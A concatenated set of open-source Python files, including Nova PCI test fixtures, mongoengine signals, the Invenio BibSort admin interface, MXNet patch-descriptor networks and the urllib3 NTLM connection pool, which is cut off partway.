if name == "beginPath" :
return self.PathObject(self)
elif name == "beginText" :
return self.TextObject(self)
else :
return self.Action(self, name)
def _PyWrite(self, pycode) :
"""Outputs the source code with a trailing newline."""
self._pyfile.write("%s\n" % pycode)
if __name__ == '__main__':
print 'For test scripts, look in tests'
|
Francis-Liu/animated-broccoli
|
refs/heads/master
|
nova/tests/unit/fake_pci_device_pools.py
|
83
|
# Copyright 2014 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.objects import pci_device_pool
# This represents the format that PCI device pool info was stored in the DB
# before this info was made into objects.
fake_pool_dict = {
'product_id': 'fake-product',
'vendor_id': 'fake-vendor',
'numa_node': 1,
't1': 'v1',
't2': 'v2',
'count': 2,
}
fake_pool = pci_device_pool.PciDevicePool(count=5,
product_id='foo',
vendor_id='bar',
numa_node=0,
tags={'t1': 'v1', 't2': 'v2'})
fake_pool_primitive = fake_pool.obj_to_primitive()
fake_pool_list = pci_device_pool.PciDevicePoolList(objects=[fake_pool])
fake_pool_list_primitive = fake_pool_list.obj_to_primitive()
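# Illustrative round-trip (hedged sketch, not part of the original file):
# primitives produced above can be rehydrated into objects, e.g.
#   pci_device_pool.PciDevicePool.obj_from_primitive(fake_pool_primitive)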
|
Pablo126/SSBW
|
refs/heads/master
|
Entrega1/lib/python3.5/site-packages/mongoengine/signals.py
|
7
|
__all__ = ('pre_init', 'post_init', 'pre_save', 'pre_save_post_validation',
'post_save', 'pre_delete', 'post_delete')
signals_available = False
try:
from blinker import Namespace
signals_available = True
except ImportError:
class Namespace(object):
def signal(self, name, doc=None):
return _FakeSignal(name, doc)
class _FakeSignal(object):
"""If blinker is unavailable, create a fake class with the same
interface that allows sending of signals but will fail with an
error on anything else. Instead of doing anything on send, it
will just ignore the arguments and do nothing instead.
"""
def __init__(self, name, doc=None):
self.name = name
self.__doc__ = doc
def _fail(self, *args, **kwargs):
raise RuntimeError('signalling support is unavailable '
'because the blinker library is '
'not installed.')
send = lambda *a, **kw: None # noqa
connect = disconnect = has_receivers_for = receivers_for = \
temporarily_connected_to = _fail
del _fail
# the namespace for code signals. If you are not mongoengine code, do
# not put signals in here. Create your own namespace instead.
_signals = Namespace()
pre_init = _signals.signal('pre_init')
post_init = _signals.signal('post_init')
pre_save = _signals.signal('pre_save')
pre_save_post_validation = _signals.signal('pre_save_post_validation')
post_save = _signals.signal('post_save')
pre_delete = _signals.signal('pre_delete')
post_delete = _signals.signal('post_delete')
pre_bulk_insert = _signals.signal('pre_bulk_insert')
post_bulk_insert = _signals.signal('post_bulk_insert')
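# Example usage (hedged sketch, not part of this module; the handler and
# sender names are hypothetical):
#
#   def audit_pre_save(sender, document, **kwargs):
#       print('about to save %r' % document)
#
#   pre_save.connect(audit_pre_save, sender=SomeDocument)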
|
jmacmahon/invenio
|
refs/heads/elasticsearch_logging
|
modules/bibsort/lib/bibsortadminlib.py
|
3
|
# This file is part of Invenio.
# Copyright (C) 2011, 2012 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Invenio BibSort Administrator Interface."""
from invenio.access_control_engine import acc_authorize_action
from invenio.dbquery import run_sql
from invenio.config import CFG_SITE_URL, CFG_BIBSORT_BUCKETS, CFG_ETCDIR, CFG_SITE_LANG
from invenio.messages import gettext_set_language, language_list_long
from invenio.bibsort_engine import delete_all_data_for_method, add_sorting_method
from invenio.bibsort_washer import get_all_available_washers
from invenio.bibrankadminlib import write_outcome, modify_translations, \
get_i8n_name, get_languages, \
tupletotable, createhiddenform
def perform_index(ln, action, bsrcode, sm_name, sm_def_type, sm_def_value, sm_washer, sm_locale):
"""
Create the BibSort main page that displays all the sorting methods.
"""
_ = gettext_set_language(ln)
out = create_important_box('<p>If you have questions, please see the %s.</p>' \
%get_admin_guide_link(ln), '#66CCFF')
if not CFG_BIBSORT_BUCKETS:
return create_important_box('<p>BibSort is not configured. In order to enable it, \
CFG_BIBSORT_BUCKETS needs to have a positive value.<br/>\
Please see the %s for more details.</p>' %get_admin_guide_link(ln))
#Treatment of the possible actions
if action == 'delete':
result = delete_all_data_for_method(bsrcode)
if not result:
return create_important_box('<p> There was an error deleting method %s. <br/>\
You can try deleting methods directly in the config file: \
(<b>%s/bibsort/bibsort.cfg</b>) <br/>\
and then load the configuration into the database using the command line tool.<br/>\
Please see the %s for more details.</p>' \
%(bsrcode, CFG_ETCDIR, get_admin_guide_link(ln)))
elif action == 'add':
sm_method = '%s: %s' % (sm_def_type.upper(), sm_def_value)
if sm_locale != 'en':
#it's not the default one, let's store it in the db with the washer
sm_washer += ':%s' % sm_locale
result = add_sorting_method(sm_name, sm_method, sm_washer)
if not result:
return create_important_box('<p> There was an error adding method %s. <br/>\
You can try adding methods directly in the config file: \
(<b>%s/bibsort/bibsort.cfg</b>) \
and then load the configuration into the database using the command line tool.<br/>\
Please see the %s for more details.</p>' \
%(sm_name, CFG_ETCDIR, get_admin_guide_link(ln)))
sorting_methods = get_sorting_methods()
if not sorting_methods:
out = create_important_box('<p>BibSort contains no methods.<br/>\
If you wish to load a previous configuration (ex: <b>%s/bibsort/bibsort.cfg</b>) \
please use the bibsort command line tool.<br/>\
Please see the %s for more details.</p>' \
%(CFG_ETCDIR, get_admin_guide_link(ln)))
else:
#display the sorting methods in a table
#header
header_list = ['Name', 'Definition', 'Washer', 'Translation', 'Action']
sm_table_header = ''
for item in header_list:
sm_table_header += '''<th class="adminheader">%s</th>''' % item
#body
sm_table_body = ''
for (sm_id, sm_name, sm_def, sm_washer) in sorting_methods:
trans_link = create_adminaction_link('modifytranslations', 'Modify', {'bsrID': sm_id, 'ln': ln})
delete_link = create_action_delete_link(sm_name, sm_id, bsrcode, ln)
sm_table_body += '''<tr>
<td class="admintdleft">%(name)s</td>
<td class="admintdleft">%(def)s</td>
<td class="admintdleft">%(washer)s</td>
<td class="admintdleft">%(trans)s</td>
<td class="admintdleft">%(action)s</td>
</tr>
'''% {'name': sm_name, 'def': sm_def, \
'washer': sm_washer, 'trans': trans_link, \
'action': delete_link}
#the sorting methods table
sm_table = '''
<table class="admin_wvar_nomargin">
<tr>%(header)s</tr>
%(body)s
</table>
''' % {'header': sm_table_header, 'body': sm_table_body}
out += sm_table
# add new bibsort method button
out += create_action_add_link()
return out
def create_action_add_link():
"""
Creates the Add action link, the Add-new-method form, and the JavaScript attached to it.
"""
add_form_js = '''
<script>
$(document).ready(function(){
$('#addform').hide();
$('#addsortingmethod').click(function() {
$('#addform').slideDown()
});
});
</script>'''
button_style = '''color: #FFFFFF; background: #3366CC;
text-decoration:none; font-weight:bold;
font-size:small; padding:5px;'''
#get the available washers
def get_washer_value():
"""Returns all the available washer methods"""
sm_washer_code = '''<select name="sm_washer">'''
sm_washer_code += '''<option value='NOOP'>NOOP</option>'''
washers = get_all_available_washers()
for washer in washers:
sm_washer_code += '''<option value='%(washer)s'>%(washer)s</option>''' \
% {'washer': washer}
sm_washer_code += '''</select>'''
return sm_washer_code
#get possibilities for field
def get_field_value():
"""Returns all the available logical fields"""
field_value = '''<div><select id='fieldmore' name="sm_field_value">'''
fields = get_all_available_fields()
for field in fields:
field_value += '''<option value='%(field)s'>%(field)s</option>''' \
% {'field': field[0]}
field_value += '''</select></div>'''
return field_value
#get possibilities for marc
def get_marc_value():
"""Returns the input field for the MARC tag"""
return '''
<div>
<input type='text' id='marcmore' name='sm_marc_value' />
</div>'''
#get possibilities for rnk
def get_rnk_value():
"""Returns all the available rnk methods"""
rnk_value = '''<div><select id='rnkmore' name="sm_rnk_value">'''
rnks = get_all_available_rnks()
for rnk in rnks:
rnk_value += '''<option value='%(rnk)s'>%(rnk)s</option>''' \
% {'rnk': rnk[0]}
rnk_value += '''</select></div>'''
return rnk_value
#get possibilities for bibrec
def get_bibrec_value():
"""Returns all the available bibrec methods"""
return '''
<div>
<select id='bibrecmore' name="sm_bibrec_value">
<option value='creation_date'>creation date</option>
<option value='modification_date'>modification date</option>
</select>
</div>'''
#get possibilities for language
def get_locale_value():
"""Returns all the available languages"""
sm_locale_code = '''<select name="sm_locale">'''
sm_locale_code += '''<option value='en'>English (default)</option>'''
langs = language_list_long(True)
for lang in langs:
if lang[0] != 'en': # we already added English as default
sm_locale_code += '''<option value='%(lang_short)s'>%(lang_long)s</option>''' \
% {'lang_short': lang[0], 'lang_long': lang[1]}
sm_locale_code += '''</select>'''
return sm_locale_code
#get the possible definition types
sm_types = ['field', 'marc', 'rnk', 'bibrec']
sm_def_code = '''<table cellspan='5' cellpadding='5'>'''
for sm_type in sm_types:
sm_def_code += '''
<tr>
<td><input type="radio" name="sm_def_type" value="%(type)s" id="%(id)s">%(name)s</td>
<td id="%(type_id)s">%(type_value)s</td>
</tr>''' \
% {'type': sm_type,
'id': sm_type + 'radio',
'name': sm_type.upper(),
'type_id': 'type' + sm_type,
'type_value': locals()['get_' + sm_type + '_value']()}
#javascript code for: when one method is selected, show its value and hide the values for the others
sm_def_code += '''<script>
$(document).ready(function(){
$('#%(type_id)s').hide();
$('#%(id)s').click(function() {
$('#%(type_id)s').show();
all_types = $.map($('input:radio[name=sm_def_type]'), function(el){return el.value;})
for (sm_type in all_types){
if ('type' + all_types[sm_type] != '%(type_id)s'){
$('#type' + all_types[sm_type]).hide();
}
}
});
});
</script>''' \
% {'id': sm_type + 'radio',
'type_id': 'type' + sm_type}
sm_def_code += '''</table>'''
#javascript for: populate field sm_def_value and delete all the sm_[type]_value
add_form = '''<script>
$(document).ready(function(){
$('#addsubmission').submit(function(){
selected_type = $('input:radio[name=sm_def_type]:checked').val();
selected_value = $('[name=sm_' + selected_type + '_value]').val();
$('[name=sm_def_value]').val(selected_value);
all_types = $.map($('input:radio[name=sm_def_type]'), function(el){return el.value;})
for (type in all_types){
$('#' + all_types[type] + 'more').remove();
}
});
});
</script>'''
add_form += '''
<div id='addform' style='border: 1px solid #FF9966; padding:10px; margin-top:20px; margin-left:10px; width:-moz-fit-content;'>
<form action='bibsortadmin.py' id='addsubmission'>
<input type='hidden' name='action' value='add'/>
<input type='hidden' name='sm_def_value' value=''/>
<table cellspacing="5" style='text-size:small;'>
<tr>
<td><b><small>Method Name:</small></b></td>
<td><input type='text' name='sm_name'/></td>
</tr>
<tr>
<td valign="top"><b><small>Method Definition:</small></b></td>
<td>%(sm_def_code)s</td>
</tr>
<tr>
<td><b><small>Method Washer:</small></b></td>
<td>%(sm_washer_code)s</td>
</tr>
<tr>
<td><b><small>Use this language when sorting:</small></b></td>
<td>%(sm_locale_code)s</td>
</tr>
<tr>
<td colspan=2 align='right'><input type='submit' value='Add' style="%(button_style)s"/></td>
</tr>
</table>
</form>
</div>
'''% {'button_style': button_style,
'sm_washer_code': get_washer_value(),
'sm_locale_code': get_locale_value(),
'sm_def_code': sm_def_code}
button_link = '''<div style="padding-top:20px; padding-left:10px;">\
<a href='#' style='%s' id='addsortingmethod'>Add New Sorting Method</a>\
</div>''' % button_style
return button_link + add_form_js + add_form
def create_action_delete_link(sm_name, sm_id, bsrcode, ln):
"""
Creates the Delete action link.
"""
if sm_id == bsrcode:
# the deletion was not successful, the method that should have been deleted is still in the database
return '<span style="color:red">Error: the method was not deleted. Please check the database permissions.</span>'
delete_confirm = '''Are you sure you want to delete the sorting method <<%s>> and all the data associated with it? [If in doubt, see the BibSort Admin Guide for details].''' % sm_name
on_click = '''return confirm('%s')''' % delete_confirm
return create_adminaction_link('', 'Delete', options={'bsrID': sm_id, 'ln': ln, 'action': 'delete'}, style='', on_click=on_click)
def getnavtrail(previous = ''):
"""Get the navtrail"""
navtrail = """<a class="navtrail" href="%s/help/admin">Admin Area</a> """ % (CFG_SITE_URL,)
navtrail = navtrail + previous
return navtrail
def check_user(req, role, authorized=0):
"""
Checks if the user is authorized to access the admin area.
"""
auth_code, auth_message = acc_authorize_action(req, role)
if not authorized and auth_code != 0:
return ("false", auth_message)
return ("", auth_message)
def get_sorting_name(bsrcode):
"""
Returns the name associated with the bsrcode in the bsrMETHOD table.
"""
try:
return run_sql('SELECT name from bsrMETHOD where id = %s', (bsrcode,))[0][0]
except IndexError:
return ''
def get_sorting_methods():
"""
Returns the list of all sorting methods defined
"""
return run_sql('SELECT id, name, definition, washer from bsrMETHOD')
def create_important_box(content, color='#FF9966'):
"""
Returns the code for a red box containing an important message
"""
return '''<div style="border:1px solid %(color)s; background: %(color)s; width=100%%; margin-bottom:10px;">
<center><i>%(content)s</i></center>
</div>''' % {'color': color, 'content': content}
def create_adminaction_link(action, name, options=None, style='', on_click=''):
"""
Returns the link corresponding to an action
@param action: the action the url should point to
@param name: the name displayed to the user
@param options: dictionary containing the url parameters
"""
#create the link parameters from the options dictionary
link_params = options and '&'.join('%s=%s' %(item, options[item]) for item in options) or ''
return '<a style="%(style)s" onclick="%(on_click)s" \
href="%(site)s/admin/bibsort/bibsortadmin.py/%(action)s?%(link_params)s">%(name)s</a>' \
% {'style': style,
'on_click': on_click,
'site': CFG_SITE_URL,
'action':action,
'link_params':link_params,
'name':name}
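#e.g. (illustration only): create_adminaction_link('modifytranslations',
#'Modify', {'bsrID': 3, 'ln': 'en'}) renders a link pointing to
#CFG_SITE_URL/admin/bibsort/bibsortadmin.py/modifytranslations?bsrID=3&ln=en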
def get_admin_guide_link(ln):
"""
Returns the link to the admin guide.
"""
_ = gettext_set_language(ln)
return '<a href="%s/help/admin/bibsort-admin-guide">%s</a>' % (CFG_SITE_URL, _('BibSort Guide'))
def get_all_available_fields():
"""
Returns all fields
"""
return run_sql("SELECT code FROM field ORDER BY code")
def get_all_available_rnks():
"""
Returns all ranking methods
"""
return run_sql("SELECT name FROM rnkMETHOD ORDER BY name")
def perform_modifytranslations(ln, bsrID, trans=None, confirm=0):
"""Modify the translations of a sort method"""
_ = gettext_set_language(ln)
output = create_important_box('<p>If you have questions, please see the %s.</p>' %get_admin_guide_link(ln), '#66CCFF')
sel_type = 'ln' #Long name
table_name = 'bsrMETHOD'
sitelangs = get_languages()
if not trans:
trans = []
if type(trans) is str:
trans = [trans]
if confirm == 2 and bsrID:
finresult = modify_translations(bsrID, sitelangs, sel_type, trans, table_name)
bsr_dict = dict(get_i8n_name(bsrID, ln, sel_type, table_name))
if bsrID and bsr_dict.has_key(bsrID):
header = ['Language', 'Translation']
actions = []
if not confirm:
trans = []
for (key, dummy) in sitelangs:
try:
trans.append(get_i8n_name(bsrID, key, sel_type, table_name)[0][1])
except StandardError:
trans.append('')
for i in range(0, len(sitelangs)):
actions.append(["%s %s" % (sitelangs[i][1], (sitelangs[i][0]==CFG_SITE_LANG and '<small>(def)</small>' or ''))])
actions[-1].append('<input type="text" name="trans" size="30" value="%s"/>' % trans[i])
text = tupletotable(header=header, tuple=actions)
output += createhiddenform(action="modifytranslations",
text=text,
button="Modify",
bsrID=bsrID,
ln=ln,
confirm=2)
if sel_type and len(trans) and confirm == 2:
output += write_outcome(finresult)
return output
|
0k/OpenUpgrade
|
refs/heads/8.0
|
addons/account_asset/report/__init__.py
|
445
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_asset_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
galad-loth/LearnDescriptor
|
refs/heads/master
|
patchmatch/feat_net.py
|
1
|
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 25 11:28:35 2018
@author: galad-loth
"""
import mxnet as mx
def featnet1(data, conv_weight, conv_bias, name_prefix):
"""
Convolutional feature network used for patch descriptor learning.
For the case of weight sharing in Siamese/Triplet structures, pre-defined weights and bias
variables are required.
The feature net is designed to process "big" patches (e.g. 64 x 64)
args:
data: input data
conv_weight: pre-defined weights for convolutional layers
conv_bias: pre-defined bias for convolutional layers
name_prefix: when multi-branch is needed, this is used to distinguish variables
in different branches
returns:
A feature net with 3 convolutional layers and 2 pooling layers.
"""
net=mx.sym.Convolution(data=data, kernel=(7,7), stride=(3,3),
pad=(3,3),num_filter=96, weight=conv_weight[0],
bias=conv_bias[0], name=name_prefix+"conv0")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu0")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2),name=name_prefix+"maxpool0")
net=mx.sym.Convolution(data=net, kernel=(5,5),stride=(1,1),
pad=(2,2), num_filter=192, weight=conv_weight[1],
bias=conv_bias[1], name=name_prefix+"conv1")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu1")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2),name=name_prefix+"maxpool1")
net=mx.sym.Convolution(data=net, kernel=(3,3),stride=(1,1),
pad=(1,1), num_filter=256, weight=conv_weight[2],
bias=conv_bias[2], name=name_prefix+"conv2")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu2")
return net
def featnet2(data, conv_weight, conv_bias, name_prefix):
"""
Convolutional feature network used for patch descriptor learning.
For the case of weight sharing in Siamese/Triplet structures, pre-defined weights and bias
variables are required.
The feature net is designed to process "mid-size" patches (e.g. 32 x 32)
args:
data: input data
conv_weight: pre-defined weights for convolutional layers
conv_bias: pre-defined bias for convolutional layers
name_prefix: when multi-branch is needed, this is used to distinguish variables
in different branches
returns:
A feature net with 4 convolutional layers and 2 pooling layers.
"""
net=mx.sym.Convolution(data=data, kernel=(5,5), stride=(1,1),
pad=(2,2), num_filter=96, weight=conv_weight[0],
bias=conv_bias[0], name=name_prefix+"conv0")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu0")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2), name=name_prefix+"maxpool0")
net=mx.sym.Convolution(data=net, kernel=(3,3), stride=(1,1),
pad=(1,1), num_filter=96, weight=conv_weight[1],
bias=conv_bias[1], name=name_prefix+"conv1")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu1")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2), name=name_prefix+"maxpool1")
net=mx.sym.Convolution(data=net, kernel=(3,3), stride=(1,1),
pad=(1,1), num_filter=192, weight=conv_weight[2],
bias=conv_bias[2], name=name_prefix+"conv2")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu2")
net=mx.sym.Convolution(data=net, kernel=(3,3), stride=(1,1),
pad=(1,1), num_filter=192, weight=conv_weight[3],
bias=conv_bias[3], name=name_prefix+"conv3")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu3")
return net
def featnet3(data, conv_weight, conv_bias, name_prefix):
"""
Convolutional feature network used for patch descriptor learning.
For the case of weight sharing in Siamese/Triplet structures, pre-defined weights and bias
variables are required.
This feature net is designed to process "large-size" patches (e.g. 64 x 64)
args:
data: input data
conv_weight: pre-defined weights for convolutional layers
conv_bias: pre-defined bias for convolutional layers
name_prefix: when multi-branch is needed, this is used to
distinguish variables in different branches
returns:
A feature net with 7 convolutional layers and 1 pooling layer.
"""
net = mx.sym.Convolution(data=data, kernel=(5, 5), stride=(3,3),
pad=(2, 2), num_filter=64, weight=conv_weight[0],
bias=conv_bias[0],name=name_prefix+"conv0")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu0")
net = mx.sym.Convolution(data=net, kernel=(3, 3), stride=(1,1),
pad=(1, 1), num_filter=64, weight=conv_weight[1],
bias=conv_bias[1],name=name_prefix+"s1_conv0")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"s1_relu0")
net = mx.sym.Convolution(data=net, kernel=(3, 3), stride=(1,1),
pad=(1, 1), num_filter=64, weight=conv_weight[2],
bias=conv_bias[2],name=name_prefix+"s1_conv1")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"s1_relu1")
net = mx.sym.Convolution(data=net, kernel=(3, 3), stride=(1,1),
pad=(1, 1), num_filter=64, weight=conv_weight[3],
bias=conv_bias[3],name=name_prefix+"s1_conv2")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"s1_relu2")
net = mx.sym.Pooling(data=net, kernel=(2,2),pool_type="max",
stride=(2,2), name=name_prefix+"maxpool0")
net = mx.sym.Convolution(data=net, kernel=(3, 3), stride=(1,1),
pad=(1, 1), num_filter=64, weight=conv_weight[4],
bias=conv_bias[4],name=name_prefix+"s2_conv0")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"s2_relu0")
net = mx.sym.Convolution(data=net, kernel=(3, 3), stride=(1,1),
pad=(1, 1), num_filter=64, weight=conv_weight[5],
bias=conv_bias[5],name=name_prefix+"s2_conv1")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"s2_relu1")
net = mx.sym.Convolution(data=net, kernel=(3, 3), stride=(1,1),
pad=(1, 1), num_filter=64, weight=conv_weight[6],
bias=conv_bias[6],name=name_prefix+"s2_conv2")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"s2_relu2")
return net
def featnet4(data, conv_weight, conv_bias, name_prefix):
"""
Convolutional feature network used for patch descriptor learning.
For the case of weight sharing in Siamese/Triplet structures, pre-defined weights
and bias variables are required.
This structure is used by PN-Net/DeepCD.
args:
data: input data
conv_weight: pre-defined weights for convolutional layers
conv_bias: pre-defined bias for convolutional layers
name_prefix: when multi-branch is needed, this is used to
distinguish variables in different branches
returns:
A feature net with 2 convolutional layers and 1 pooling layer.
"""
net=mx.sym.Convolution(data=data, kernel=(7,7), stride=(1,1), num_filter=32,
weight=conv_weight[0], bias=conv_bias[0], name=name_prefix+"conv0")
net=mx.sym.Activation(data=net, act_type="tanh", name=name_prefix+"tanh0")
net = mx.sym.Pooling(data=net, kernel=(2,2),pool_type="max",
stride=(2,2), name=name_prefix+"maxpool0")
net=mx.sym.Convolution(data=net, kernel=(6,6), stride=(1,1), num_filter=64,
weight=conv_weight[1], bias=conv_bias[1], name=name_prefix+"conv1")
net=mx.sym.Activation(data=net, act_type="tanh", name=name_prefix+"tanh1")
return net
def featnet5(data, conv_weight, conv_bias, feat_dim=512, name_prefix=""):
"""
Convolutional feature network used for patch descriptor learning.
For the case of weight sharing in Siamese/Triplet structures, pre-defined weights
and bias variables are required.
This structure is used by match_net.
args:
data: input data
conv_weight: pre-defined weights for convolutional layers
conv_bias: pre-defined bias for convolutional layers
feat_dim: the dimensionality of the extracted feature
name_prefix: when multi-branch is needed, this is used to
distinguish variables in different branches
returns:
A feature net with 5 convolutional layers and 3 pooling layers.
"""
net=mx.sym.Convolution(data=data, kernel=(7,7), stride=(1,1),
pad=(3,3),num_filter=24, weight=conv_weight[0],
bias=conv_bias[0], name=name_prefix+"conv0")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu0")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2),name=name_prefix+"maxpool0")
net=mx.sym.Convolution(data=net, kernel=(5,5),stride=(1,1),
pad=(2,2), num_filter=64, weight=conv_weight[1],
bias=conv_bias[1], name=name_prefix+"conv1")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu1")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2),name=name_prefix+"maxpool1")
net=mx.sym.Convolution(data=net, kernel=(3,3),stride=(1,1),
pad=(1,1), num_filter=96, weight=conv_weight[2],
bias=conv_bias[2], name=name_prefix+"conv2")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu2")
net=mx.sym.Convolution(data=net, kernel=(3,3),stride=(1,1),
pad=(1,1), num_filter=96, weight=conv_weight[3],
bias=conv_bias[3], name=name_prefix+"conv3")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu3")
net=mx.sym.Convolution(data=net, kernel=(3,3),stride=(1,1),
pad=(1,1), num_filter=96, weight=conv_weight[4],
bias=conv_bias[4], name=name_prefix+"conv4")
net=mx.sym.Activation(data=net, act_type="relu", name=name_prefix+"relu4")
net=mx.sym.Pooling(data=net, kernel=(2,2), pool_type="max",
stride=(2,2),name=name_prefix+"maxpool2")
net = mx.sym.Flatten(data=net)
net = mx.sym.FullyConnected(data=net,num_hidden=feat_dim, weight=conv_weight[5],
bias=conv_bias[5],name=name_prefix+"bottleneck")
return net
if __name__=="__main__":
data=mx.sym.Variable("data")
conv_weight=[]
conv_bias=[]
for i in range(6):
conv_weight.append(mx.sym.Variable("conv"+str(i)+"_weight"))
conv_bias.append(mx.sym.Variable("conv"+str(i)+"_bias"))
feat_net=featnet5(data, conv_weight, conv_bias,name_prefix="feat_")
ex=feat_net.simple_bind(ctx=mx.cpu(), data=(50, 3, 64, 64))
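# Illustrative check (added sketch, not in the original script): the bound
# executor allocates its output arrays at bind time, so for a
# (50, 3, 64, 64) input batch the bottleneck feature should be (50, 512).
print(ex.outputs[0].shape)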
|
ntt-sic/neutron
|
refs/heads/master
|
neutron/plugins/mlnx/common/__init__.py
|
139
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
|
bfrgoncalves/Online-PhyloViZ
|
refs/heads/master
|
node_modules/l/node_modules/hook.io/node_modules/npm/node_modules/node-gyp/gyp/test/same-gyp-name/gyptest-default.py
|
318
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Build a .gyp that depends on 2 gyp files with the same name.
"""
import TestGyp
test = TestGyp.TestGyp()
test.run_gyp('all.gyp', chdir='src')
test.relocate('src', 'relocate/src')
test.build('all.gyp', chdir='relocate/src')
expect1 = """\
Hello from main1.cc
"""
expect2 = """\
Hello from main2.cc
"""
if test.format == 'xcode':
chdir1 = 'relocate/src/subdir1'
chdir2 = 'relocate/src/subdir2'
else:
chdir1 = chdir2 = 'relocate/src'
test.run_built_executable('program1', chdir=chdir1, stdout=expect1)
test.run_built_executable('program2', chdir=chdir2, stdout=expect2)
test.pass_test()
|
edensparkles/FIRSTAID
|
refs/heads/master
|
FIRST_AID/venv/Lib/site-packages/pip/_vendor/requests/packages/urllib3/contrib/ntlmpool.py
|
514
|
"""
NTLM authenticating pool, contributed by erikcederstran
Issue #10, see: http://code.google.com/p/urllib3/issues/detail?id=10
"""
from __future__ import absolute_import
try:
from http.client import HTTPSConnection
except ImportError:
from httplib import HTTPSConnection
from logging import getLogger
from ntlm import ntlm
from urllib3 import HTTPSConnectionPool
log = getLogger(__name__)
class NTLMConnectionPool(HTTPSConnectionPool):
"""
Implements an NTLM authentication version of an urllib3 connection pool
"""
scheme = 'https'
def __init__(self, user, pw, authurl, *args, **kwargs):
"""
authurl is a random URL on the server that is protected by NTLM.
user is the Windows user, probably in the DOMAIN\\username format.
pw is the password for the user.
"""
super(NTLMConnectionPool, self).__init__(*args, **kwargs)
self.authurl = authurl
self.rawuser = user
user_parts = user.split('\\', 1)
self.domain = user_parts[0].upper()
self.user = user_parts[1]
self.pw = pw
def _new_conn(self):
# Performs the NTLM handshake that secures the connection. The socket
# must be kept open while requests are performed.
self.num_connections += 1
log.debug('Starting NTLM HTTPS connection no. %d: https://%s%s',
self.num_connections, self.host, self.authurl)
headers = {}
headers['Connection'] = 'Keep-Alive'
req_header = 'Authorization'
resp_header = 'www-authenticate'
conn = HTTPSConnection(host=self.host, port=self.port)
# Send negotiation message
headers[req_header] = (
'NTLM %s' % ntlm.create_NTLM_NEGOTIATE_MESSAGE(self.rawuser))
log.debug('Request headers: %s', headers)
conn.request('GET', self.authurl, None, headers)
res = conn.getresponse()
reshdr = dict(res.getheaders())
log.debug('Response status: %s %s', res.status, res.reason)
log.debug('Response headers: %s', reshdr)
log.debug('Response data: %s [...]', res.read(100))
# Remove the reference to the socket, so that it can not be closed by
# the response object (we want to keep the socket open)
res.fp = None
# Server should respond with a challenge message
auth_header_values = reshdr[resp_header].split(', ')
auth_header_value = None
for s in auth_header_values:
if s[:5] == 'NTLM ':
auth_header_value = s[5:]
if auth_header_value is None:
raise Exception('Unexpected %s response header: %s' %
(resp_header, reshdr[resp_header]))
# Send authentication message
ServerChallenge, NegotiateFlags = \
